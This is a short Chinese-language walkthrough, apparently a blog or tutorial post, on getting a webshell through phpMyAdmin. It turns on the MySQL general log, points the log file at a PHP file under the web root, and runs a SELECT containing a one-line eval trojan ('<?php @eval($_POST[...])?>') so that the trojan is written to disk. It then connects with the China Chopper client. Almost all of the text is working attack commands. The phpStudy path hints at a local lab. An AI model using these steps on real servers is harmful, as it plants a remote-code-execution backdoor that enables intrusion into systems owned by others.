general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句
所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell
进入phpMyAdmin后在SQL处执行SQL语句
首先查看general log是否开启
show variables like ‘general_log‘;
general log是关闭状态,执行SQL语句开启general log
set global general_log=on;
开启成功
然后把general_log_file设置为shell的绝对路径
SET global general_log_file=‘C:/phpStudy/PHPTutorial/WWW/x.php‘;
创建的x.php里的内容
然后执行SQL查询语句
SELECT ‘<?php @eval($_POST["x"]);?>‘;
执行成功
看一下x.php里的内容
成功插入了一句话木马
用菜刀连接,看看是否能够解析的
连接成功
